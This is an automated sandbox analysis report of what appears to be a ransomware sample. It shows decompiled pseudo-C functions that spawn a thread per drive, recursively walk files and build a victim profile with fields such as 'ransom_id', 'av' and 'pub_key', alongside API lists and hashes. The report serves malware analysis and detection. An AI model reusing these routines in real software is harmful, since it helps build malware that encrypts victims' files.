Opcode Fuzzy Hash: b788b534275cfb914030b1c27688c49dd11fa4b54458ea966c16f7cdcb022cd9
Instruction Fuzzy Hash: 9A119330504295AAEB211F68990C767BF5CAF12352F2440BFE8C5FB391C7398D4687A9

Uniqueness

Uniqueness Score: -1.00%

Function 00403DE0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00403DE0(struct _SECURITY_ATTRIBUTES* __ecx) {
				char _v612;
				char _v644;
				void* _v908;
				void* _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				short _v924;
				signed int _v928;
				intOrPtr _v932;
				void* _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				long _v952;
				struct _SECURITY_ATTRIBUTES* _v956;
				struct _SECURITY_ATTRIBUTES* _v960;
				struct _SECURITY_ATTRIBUTES* _v964;
				char _v968;
				void* _t67;
				short _t68;
				intOrPtr _t69;
				int _t72;
				long _t75;
				signed int _t77;
				signed int _t80;
				intOrPtr* _t82;
				void* _t84;
				struct _SECURITY_ATTRIBUTES* _t87;
				long _t88;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t95;
				char _t101;
				intOrPtr _t106;
				void _t110;
				struct _SECURITY_ATTRIBUTES** _t114;
				intOrPtr _t115;
				signed int _t119;
				void* _t121;

				_t121 = (_t119 & 0xfffffff8) - 0x3c4;
				_t87 = __ecx;
				_v964 = __ecx;
				_t67 = VirtualAlloc(0, 0x18, 0x3000, 4);
				 *((intOrPtr*)(_t67 + 4)) = _t87;
				_t88 = 0;
				 *_t67 = 0x43;
				_t68 =  *L"?:\\"; // 0x3a003f
				_v924 = _t68;
				_t69 =  *0x40e308; // 0x5c
				_v920 = _t69;
				_v968 = GetTickCount();
				_t114 =  &_v644;
				_t110 = 0x41;
				do {
					_v924 = _t110;
					_t72 = GetDriveTypeW( &_v924);
					if(_t72 >= 2 && _t72 != 5) {
						 *((intOrPtr*)(_t114 - 4)) = _v964;
						_t84 = _t114 - 8;
						 *_t84 = _t110;
						 *_t114 = 0;
						_t114[2] = 0;
						_t114[3] = 0;
						 *((intOrPtr*)(_t121 + 0x48 + _t88 * 4)) = CreateThread(0, 0, E00406840, _t84, 0, 0);
						_t88 = _t88 + 1;
						_t114 =  &(_t114[6]);
					}
					_t110 = _t110 + 1;
				} while (_t110 <= 0x5a);
				_v952 = _t88;
				asm("xorps xmm0, xmm0");
				_v956 = 0;
				_v960 = 0;
				asm("movlpd [esp+0x38], xmm0");
				asm("movlpd [esp+0x30], xmm0");
				WaitForMultipleObjects(_t88,  &_v908, 1, 0xffffffff);
				_t75 = GetTickCount();
				asm("xorps xmm0, xmm0");
				_t115 = _v948;
				_v932 = _t75 - _v968;
				_t77 = 0;
				_v964 = 0;
				asm("movlpd [esp+0x40], xmm0");
				if(_t88 < 2) {
					_t95 = _v940;
					_t106 = _v944;
				} else {
					_t26 = _t88 - 2; // -1
					_t92 = _v940;
					_t82 =  &_v612;
					_t101 = (_t26 >> 1) + 1;
					_v968 = _t101;
					_v928 = _t101 + _t101;
					_t106 = _v944;
					do {
						_t92 = _t92 +  *((intOrPtr*)(_t82 - 0x18));
						_v956 = _v956 +  *((intOrPtr*)(_t82 - 0x20));
						asm("adc edi, [eax-0x14]");
						_t115 = _t115 +  *_t82;
						_v960 = _v960 +  *((intOrPtr*)(_t82 - 8));
						asm("adc edx, [eax+0x4]");
						_t82 = _t82 + 0x30;
						_t41 =  &_v968;
						 *_t41 = _v968 - 1;
					} while ( *_t41 != 0);
					_t77 = _v928;
					_v968 = _t92;
					_t88 = _v952;
					_t95 = _v968;
				}
				if(_t77 >= _t88) {
					_t89 = _v916;
				} else {
					_t80 = _t77 + _t77 * 2;
					_v964 =  *((intOrPtr*)(_t121 + 0x150 + _t80 * 8));
					_t89 =  *((intOrPtr*)(_t121 + 0x158 + _t80 * 8));
				}
				asm("adc edx, edi");
				asm("adc edx, eax");
				return E00405540(_v960 + _v956 + _v964, _v932, _t115 + _t95 + _t89, _t106);
			}

0x00403de6
0x00403df8
0x00403dfc
0x00403e00
0x00403e0b
0x00403e0e
0x00403e10
0x00403e13
0x00403e18
0x00403e1c
0x00403e21
0x00403e2b
0x00403e2f
0x00403e36
0x00403e40
0x00403e44
0x00403e4a
0x00403e53
0x00403e62
0x00403e65
0x00403e72
0x00403e75
0x00403e7b
0x00403e82
0x00403e8f
0x00403e93
0x00403e94
0x00403e94
0x00403e97
0x00403e98
0x00403ea6
0x00403eaa
0x00403ead
0x00403eb7
0x00403ebf
0x00403ec5
0x00403ecb
0x00403ed1
0x00403edb
0x00403ee2
0x00403ee6
0x00403eea
0x00403eec
0x00403ef4
0x00403efd
0x00403f5c
0x00403f60
0x00403eff
0x00403eff
0x00403f02
0x00403f08
0x00403f0f
0x00403f10
0x00403f17
0x00403f1b
0x00403f20
0x00403f27
0x00403f2a
0x00403f2e
0x00403f38
0x00403f3a
0x00403f3e
0x00403f41
0x00403f44
0x00403f44
0x00403f44
0x00403f4a
0x00403f4e
0x00403f52
0x00403f56
0x00403f56
0x00403f66
0x00403f8a
0x00403f68
0x00403f68
0x00403f72
0x00403f76
0x00403f7d
0x00403f94
0x00403f98
0x00403fb6

APIs

VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004), ref: 00403E00
GetTickCount.KERNEL32 ref: 00403E25
GetDriveTypeW.KERNEL32(?), ref: 00403E4A
CreateThread.KERNEL32 ref: 00403E89
WaitForMultipleObjects.KERNEL32(00000000,?), ref: 00403ECB
GetTickCount.KERNEL32 ref: 00403ED1

Strings

?:\, xrefs: 00403E13

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: CountTick$AllocCreateDriveMultipleObjectsThreadTypeVirtualWait
String ID: ?:\
API String ID: 458387131-2533537817
Opcode ID: 3380b7a9da389f35d06b469346c9bb498d51bc5a763c595ddef6b732e49dbda3
Instruction ID: a427c5faede150c50d802e976730206525a879d89cb9664245e235534ffcdea3
Opcode Fuzzy Hash: 3380b7a9da389f35d06b469346c9bb498d51bc5a763c595ddef6b732e49dbda3
Instruction Fuzzy Hash: FF5136719083019FC310CF14C988B5BBBE5FF88315F504A2EFA89A73A1D375A944CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00406840 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406840(void* _a4) {
				intOrPtr _v0;
				intOrPtr _v4;
				long _v8;
				intOrPtr _v12;
				void* _v16;
				struct _CRITICAL_SECTION _v40;
				WCHAR* _t12;
				void* _t22;

				_t12 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_t22 = _a4;
				wsprintfW(_t12, L"%c:\\",  *_t22 & 0x0000ffff);
				InitializeCriticalSection( &_v40);
				_v12 = 0x2710;
				_v8 = 0;
				_v4 = 0xffffffff;
				_v0 = 0xffffffff;
				_v16 = VirtualAlloc(0, 0x9c40, 0x3000, 4);
				E004066F0(_t22 + 8, _t12,  &_v40,  *((intOrPtr*)(_t22 + 4)), _t22 + 8, _t22 + 0x10);
				VirtualFree(_t22, 0, 0x8000);
				ExitThread(0);
			}

0x00406859
0x0040685f
0x0040686e
0x0040687c
0x00406890
0x00406898
0x004068a0
0x004068a8
0x004068b6
0x004068cb
0x004068db
0x004068e3

APIs

VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040), ref: 00406859
wsprintfW.USER32 ref: 0040686E
InitializeCriticalSection.KERNEL32(?), ref: 0040687C
VirtualAlloc.KERNEL32 ref: 004068B0

Part of subcall function 004066F0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 00406723
Part of subcall function 004066F0: lstrcatW.KERNEL32(00000000,00410364), ref: 0040673B
Part of subcall function 004066F0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00406745

VirtualFree.KERNEL32(?,00000000,00008000,00009C40,00003000,00000004), ref: 004068DB
ExitThread.KERNEL32 ref: 004068E3

Strings

%c:\, xrefs: 00406868

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$CriticalExitFileFindFirstFreeInitializeSectionThreadlstrcatlstrlenwsprintf
String ID: %c:\
API String ID: 1988002015-3142399695
Opcode ID: 234e897b3db6d0822de12132551c07e096dda7dd2848727a29eb3a1be7f74770
Instruction ID: d88b45d10d8f236cef520cbec221070cd426d639c7b6d1ffd4d7ad39dfd3f75c
Opcode Fuzzy Hash: 234e897b3db6d0822de12132551c07e096dda7dd2848727a29eb3a1be7f74770
Instruction Fuzzy Hash: 800196B5244300BFE7109F50CD8EF577BA8AB84B14F004628FB65AD1E2D7B09904CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004033E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E004033E0(int* __ecx, void* __eflags, char _a4) {
				int* _v8;
				void* _t8;
				char _t10;
				void* _t14;
				void* _t15;
				char _t18;
				char _t19;
				int _t20;
				CHAR* _t23;
				CHAR* _t26;
				CHAR* _t35;
				CHAR* _t40;

				_push(__ecx);
				_t1 =  &_a4; // 0x405135
				_t26 =  *_t1;
				_t37 = __ecx;
				_v8 = __ecx;
				__ecx[3] = _t26;
				_t8 = E004032B0(__ecx);
				if(_t8 == 0 || _t8 == 0xffffffff) {
					ExitProcess(0);
				}
				if(E00403320(__ecx) == 0) {
					 *__ecx = 0;
					_t10 =  *_t26;
					if(_t10 == 0) {
						goto L4;
					} else {
						do {
							if(_t10 == 0x7b) {
								_t26 =  &(_t26[1]);
								_t14 = E00403190(_t26);
								if(_t14 != 0) {
									_t15 = _t14 - 1;
									if(_t15 == 0) {
										E00403200(_t37, _t26, 1);
									} else {
										if(_t15 == 1) {
											_t18 =  *_t26;
											_t35 = _t26;
											if(_t18 == 0) {
												L15:
												_t19 =  *_t35;
												if(_t19 != 0x7d) {
													_t40 = _t35;
													if(_t19 != 0) {
														while( *_t40 != 0x7d) {
															_t40 =  &(_t40[1]);
															if( *_t40 != 0) {
																continue;
															} else {
															}
															goto L21;
														}
														 *_t40 = 0;
													}
													L21:
													_t20 = lstrlenA(_t35);
													_t23 = HeapAlloc(GetProcessHeap(), 8, _t20 + 1);
													 *(_v8 + 8) = _t23;
													if(_t23 != 0) {
														lstrcpyA(_t23, _t35);
													}
													 *_t40 = 0x7d;
													_t37 = _v8;
												}
											} else {
												while(_t18 != 0x7d) {
													_t35 =  &(_t35[1]);
													if(_t18 == 0x3d) {
														goto L15;
													} else {
														_t18 =  *_t35;
														if(_t18 != 0) {
															continue;
														} else {
															goto L15;
														}
													}
													goto L25;
												}
											}
										}
									}
								}
							}
							L25:
							_t10 = _t26[1];
							_t26 =  &(_t26[1]);
						} while (_t10 != 0);
						return 1;
					}
				} else {
					 *__ecx = 1;
					L4:
					return 1;
				}
			}

0x004033e3
0x004033e5
0x004033e5
0x004033e9
0x004033eb
0x004033ee
0x004033f1
0x004033f8
0x004034db
0x004034db
0x00403410
0x00403425
0x0040342b
0x0040342f
0x00000000
0x00403431
0x00403432
0x00403434
0x0040343a
0x00403441
0x00403444
0x0040344a
0x0040344b
0x004034ba
0x0040344d
0x0040344e
0x00403450
0x00403452
0x00403456
0x00403467
0x00403467
0x0040346b
0x0040346d
0x00403471
0x00403473
0x00403478
0x0040347c
0x00000000
0x00000000
0x0040347e
0x00000000
0x0040347c
0x00403480
0x00403480
0x00403483
0x00403484
0x00403495
0x0040349e
0x004034a3
0x004034a7
0x004034a7
0x004034ad
0x004034b0
0x004034b0
0x00000000
0x00403458
0x0040345c
0x0040345f
0x00000000
0x00403461
0x00403461
0x00403465
0x00000000
0x00000000
0x00000000
0x00000000
0x00403465
0x00000000
0x0040345f
0x00403458
0x00403456
0x0040344e
0x0040344b
0x00403444
0x004034bf
0x004034bf
0x004034c2
0x004034c3
0x004034d6
0x004034d6
0x00403412
0x00403412
0x00403418
0x00403422
0x00403422

APIs

Part of subcall function 004032B0: lstrlenA.KERNEL32(?,00000000,?,5Q@,?,?,004033F6,?,74CB66A0,?,?,00405135,00000000), ref: 004032C5
Part of subcall function 004032B0: lstrlenA.KERNEL32(?,?,004033F6,?,74CB66A0,?,?,00405135,00000000), ref: 004032EE

lstrlenA.KERNEL32(5Q@,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403484
GetProcessHeap.KERNEL32(00000008,00000001,?,00405135,00000000), ref: 0040348E
HeapAlloc.KERNEL32(00000000,?,00405135,00000000), ref: 00403495
lstrcpyA.KERNEL32(00000000,5Q@,?,00405135,00000000), ref: 004034A7
ExitProcess.KERNEL32 ref: 004034DB

Strings

5Q@, xrefs: 004033E5, 0040343B, 00403483, 004034A5, 004034B7

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: lstrlen$HeapProcess$AllocExitlstrcpy
String ID: 5Q@
API String ID: 1867342102-144561132
Opcode ID: 21661da1c7e2a165306f5dc85369bd9d986d501ed5d2751d7a9df859c23e26cf
Instruction ID: a602f992c252cea2a24e073b1cce2c09e2fd92cb4485f691b182cac4319fe13f
Opcode Fuzzy Hash: 21661da1c7e2a165306f5dc85369bd9d986d501ed5d2751d7a9df859c23e26cf
Instruction Fuzzy Hash: BA31E3305042455AEB265F289C447B77FAC9B06312F1841BBE8C5BF3C2D67D4E4787A9

Uniqueness

Uniqueness Score: -1.00%

Function 00402C50 Relevance: 10.6, APIs: 7, Instructions: 62
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402C50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagPAINTSTRUCT _v68;
				struct tagPAINTSTRUCT _v88;
				short _v100;
				intOrPtr _t13;
				void* _t15;
				struct HDC__* _t21;
				int _t30;

				_t13 =  *0x40e290; // 0x21
				asm("movdqu xmm0, [0x40e280]");
				_t30 = _a8;
				_v88.fErase = _t13;
				asm("movdqu [esp+0x10], xmm0");
				_t15 = _t30 - 2;
				if(_t15 == 0) {
					CreateThread(0, 0, E00402AD0, 0, 0, 0);
					DestroyWindow(_a4);
					return 0xdeadbeef;
				} else {
					if(_t15 == 0xd) {
						_t21 = BeginPaint(_a4,  &_v68);
						TextOutW(_t21, 5, 5,  &_v100, lstrlenW( &_v100));
						EndPaint(_a4,  &_v88);
						return 0;
					} else {
						return DefWindowProcW(_a4, _t30, _a12, _a16);
					}
				}
			}

0x00402c59
0x00402c5e
0x00402c66
0x00402c69
0x00402c70
0x00402c76
0x00402c79
0x00402ce9
0x00402cf2
0x00402d01
0x00402c7b
0x00402c7e
0x00402c9f
0x00402cbd
0x00402ccb
0x00402cd7
0x00402c80
0x00402c94
0x00402c94
0x00402c7e

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00402C8A
BeginPaint.USER32(?,?), ref: 00402C9F
lstrlenW.KERNEL32(?), ref: 00402CAC
TextOutW.GDI32(00000000,00000005,00000005,?,00000000), ref: 00402CBD
EndPaint.USER32(?,?), ref: 00402CCB
CreateThread.KERNEL32 ref: 00402CE9
DestroyWindow.USER32(?), ref: 00402CF2

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: PaintWindow$BeginCreateDestroyProcTextThreadlstrlen
String ID:
API String ID: 572880375-0
Opcode ID: c81bb7d4f7cc3b0479ad99f25df51467dc5e8c815c493290e282321582db75ec
Instruction ID: 316be470bdb16b495eaa6a8a4de42634492684a59cc3721c0e018fd81b09cf01
Opcode Fuzzy Hash: c81bb7d4f7cc3b0479ad99f25df51467dc5e8c815c493290e282321582db75ec
Instruction Fuzzy Hash: D5116332604209ABE711DF54EE0DFAA7B6CFB48311F000626FD45E91E1E7B19D24DB99

Uniqueness

Uniqueness Score: -1.00%

Function 004039B0 Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004039B0(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a28, intOrPtr _a36, intOrPtr _a44, intOrPtr _a52, intOrPtr _a60, intOrPtr _a76, intOrPtr _a84) {
				intOrPtr* _t44;

				_t44 = __ecx;
				 *__ecx = _a4;
				 *((intOrPtr*)(__ecx + 0xc)) = _a12;
				 *((intOrPtr*)(__ecx + 0x24)) = _a28;
				 *((intOrPtr*)(__ecx + 0x30)) = _a36;
				 *((intOrPtr*)(__ecx + 0x3c)) = _a44;
				 *((intOrPtr*)(__ecx + 0x48)) = _a52;
				 *((intOrPtr*)(__ecx + 0x54)) = _a60;
				 *((intOrPtr*)(__ecx + 0x74)) = _a76;
				 *(__ecx + 4) = L"pc_user";
				 *(__ecx + 0x10) = L"pc_name";
				 *((intOrPtr*)(__ecx + 0x18)) = 1;
				 *(__ecx + 0x1c) = L"pc_group";
				 *(__ecx + 0x28) = L"av";
				 *(__ecx + 0x34) = L"pc_lang";
				 *(__ecx + 0x40) = L"pc_keyb";
				 *(__ecx + 0x4c) = L"os_major";
				 *(__ecx + 0x58) = L"os_bit";
				 *((intOrPtr*)(__ecx + 0x60)) = 1;
				 *(__ecx + 0x64) = L"ransom_id";
				 *((intOrPtr*)(__ecx + 0x78)) = L"hdd";
				 *((intOrPtr*)(__ecx + 0x80)) = _a84;
				 *(__ecx + 0x88) = L"ip";
				 *((intOrPtr*)(_t44 + 0x8c)) = GetProcessHeap();
				return _t44;
			}

0x004039b7
0x004039b9
0x004039be
0x004039c4
0x004039ca
0x004039d0
0x004039d6
0x004039dc
0x004039e2
0x004039e8
0x004039ef
0x004039f6
0x004039fd
0x00403a04
0x00403a0b
0x00403a12
0x00403a19
0x00403a20
0x00403a27
0x00403a2e
0x00403a35
0x00403a3c
0x00403a42
0x00403a52
0x00403a5c

APIs

GetProcessHeap.KERNEL32(?,?,00404587,00000000,?,00000000), ref: 00403A4C

Strings

@@, xrefs: 00403A19
0@, xrefs: 00403A20
T@, xrefs: 00403A12
|@, xrefs: 004039FD
d@, xrefs: 00403A0B
t@, xrefs: 00403A04

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID: 0@$@@$T@$d@$t@$|@
API String ID: 54951025-2847450446
Opcode ID: 9fc73a0d6419aa769ded072bd8f0af5eaef3b33f8b2fda6b5b6c05d8156f3e3f
Instruction ID: 81848ed92efb6c47f2188ed1792c8f7cddf9ec8f0008dcc1071cc611d3409556
Opcode Fuzzy Hash: 9fc73a0d6419aa769ded072bd8f0af5eaef3b33f8b2fda6b5b6c05d8156f3e3f
Instruction Fuzzy Hash: D5114EB4501B448FC7A0CF6AC58468ABFF0BB08718B409D2EE99A97B50D3B5B458CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406769 Relevance: 9.0, APIs: 6, Instructions: 48
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00406769() {
				intOrPtr* _t34;
				intOrPtr* _t38;
				void* _t40;
				WCHAR* _t46;
				void* _t51;

				do {
					if(lstrcmpW(_t51 - 0x238, ".") != 0 && lstrcmpW(_t51 - 0x238, L"..") != 0) {
						lstrcatW(_t46, _t51 - 0x238);
						if(( *(_t51 - 0x264) & 0x00000010) == 0) {
							 *((intOrPtr*)(_t51 - 0xc)) =  *_t38;
							 *_t38 =  *_t38 + E004063B0(_t46, _t51 - 0x264, _t40,  *((intOrPtr*)(_t51 + 8)));
							asm("adc [ebx+0x4], edx");
							__eflags =  *((intOrPtr*)(_t38 + 4)) -  *((intOrPtr*)(_t38 + 4));
							if(__eflags <= 0) {
								if(__eflags < 0) {
									L8:
									_t34 =  *((intOrPtr*)(_t51 + 0xc));
									 *_t34 =  *_t34 + 1;
									__eflags =  *_t34;
								} else {
									__eflags =  *((intOrPtr*)(_t51 - 0xc)) -  *_t38;
									if( *((intOrPtr*)(_t51 - 0xc)) <  *_t38) {
										goto L8;
									}
								}
							}
						} else {
							E004066F0(lstrcatW(_t46, "\\"), _t46,  *((intOrPtr*)(_t51 - 0x14)),  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)), _t38);
						}
						 *((short*)( *((intOrPtr*)(_t51 - 0x10)))) = 0;
					}
				} while (FindNextFileW( *(_t51 - 8), _t51 - 0x264) != 0);
				FindClose( *(_t51 - 8));
				return 0;
			}

0x00406770
0x00406784
0x004067a8
0x004067b1
0x004067e2
0x004067ed
0x004067ef
0x004067f2
0x004067f5
0x004067f7
0x00406800
0x00406800
0x00406803
0x00406803
0x004067f9
0x004067fc
0x004067fe
0x00000000
0x00000000
0x004067fe
0x004067f7
0x004067b3
0x004067c7
0x004067cc
0x00406810
0x00406810
0x00406823
0x0040682e
0x0040683c

APIs

lstrcmpW.KERNEL32(?,00410368,?,?), ref: 0040677C
lstrcmpW.KERNEL32(?,0041036C,?,?), ref: 00406796
lstrcatW.KERNEL32(00000000,?), ref: 004067A8
lstrcatW.KERNEL32(00000000,0041039C), ref: 004067B9

Part of subcall function 004066F0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 00406723
Part of subcall function 004066F0: lstrcatW.KERNEL32(00000000,00410364), ref: 0040673B
Part of subcall function 004066F0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00406745

FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0040681D
FindClose.KERNEL32(00003000,?,?), ref: 0040682E

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: Findlstrcat$Filelstrcmp$CloseFirstNextlstrlen
String ID:
API String ID: 2032009209-0
Opcode ID: 2681e2e019e2eb95221ac8e5d6fef7f6142544138e274b8588e706dd0773f05b
Instruction ID: 9b87114a5c2e2fa11aec6284b95cd243dd4daa46cd42d80c1a26711d7dff17e5
Opcode Fuzzy Hash: 2681e2e019e2eb95221ac8e5d6fef7f6142544138e274b8588e706dd0773f05b
Instruction Fuzzy Hash: 6F012D31A0021DABDF21AB60DC48BEE7BB8EF44704F0444B6F806E61A1D7798A91CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00403190 Relevance: 9.0, APIs: 2, Strings: 4, Instructions: 42
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403190(char _a4) {
				char _t6;
				CHAR* _t13;
				CHAR* _t16;

				_t1 =  &_a4; // 0x405135
				_t13 =  *_t1;
				_t16 = _t13;
				if( *_t13 == 0) {
					L5:
					lstrcmpiA(_t13, "mask");
					_t2 =  &_a4; // 0x405135
					_t10 =  ==  ? 1 : 0;
					lstrcmpiA( *_t2, "pub_key");
					 *_t16 = 0x3d;
					_t11 =  ==  ? 2 :  ==  ? 1 : 0;
					_t5 =  ==  ? 2 :  ==  ? 1 : 0;
					return  ==  ? 2 :  ==  ? 1 : 0;
				} else {
					while(1) {
						_t6 =  *_t16;
						if(_t6 == 0x7d) {
							break;
						}
						if(_t6 == 0x3d) {
							 *_t16 = 0;
							goto L5;
						} else {
							_t16 =  &(_t16[1]);
							if( *_t16 != 0) {
								continue;
							} else {
								goto L5;
							}
						}
						goto L8;
					}
					return 0;
				}
				L8:
			}

0x00403193
0x00403193
0x00403197
0x0040319c
0x004031b0
0x004031b9
0x004031c4
0x004031ce
0x004031d1
0x004031d9
0x004031e1
0x004031e4
0x004031e9
0x004031a0
0x004031a0
0x004031a0
0x004031a4
0x00000000
0x00000000
0x004031a8
0x004031ec
0x00000000
0x004031aa
0x004031aa
0x004031ae
0x00000000
0x00000000
0x00000000
0x00000000
0x004031ae
0x00000000
0x004031a8
0x004031f5
0x004031f5
0x00000000

APIs

lstrcmpiA.KERNEL32(5Q@,mask,5Q@,?,?,00403441,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 004031B9
lstrcmpiA.KERNEL32(5Q@,pub_key,?,00403441,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 004031D1

Strings

mask, xrefs: 004031B1
5Q@, xrefs: 00403193, 004031C4, 004031B6
pub_key, xrefs: 004031BF
5Q@, xrefs: 004031B0

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: 5Q@$5Q@$mask$pub_key
API String ID: 1586166983-363831109
Opcode ID: bb2af6430398937933059d9a79bd65117c4dfe7bbf55f0997fe80ddbfe01824b
Instruction ID: 77421031a41d7d6ff0c7d7d831153f50eac579c1ccc453c74b5f930fdf35060a
Opcode Fuzzy Hash: bb2af6430398937933059d9a79bd65117c4dfe7bbf55f0997fe80ddbfe01824b
Instruction Fuzzy Hash: 09F0F6713082845EF7194E689C41BA3BFCD9B59311F5805BFE689E62D1C6BD8D81839C

Uniqueness

Uniqueness Score: -1.00%

Function 00403AE0 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00403B32
VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 00403B56
VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 00403B5A
VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 00403B5E
VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00403B85

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
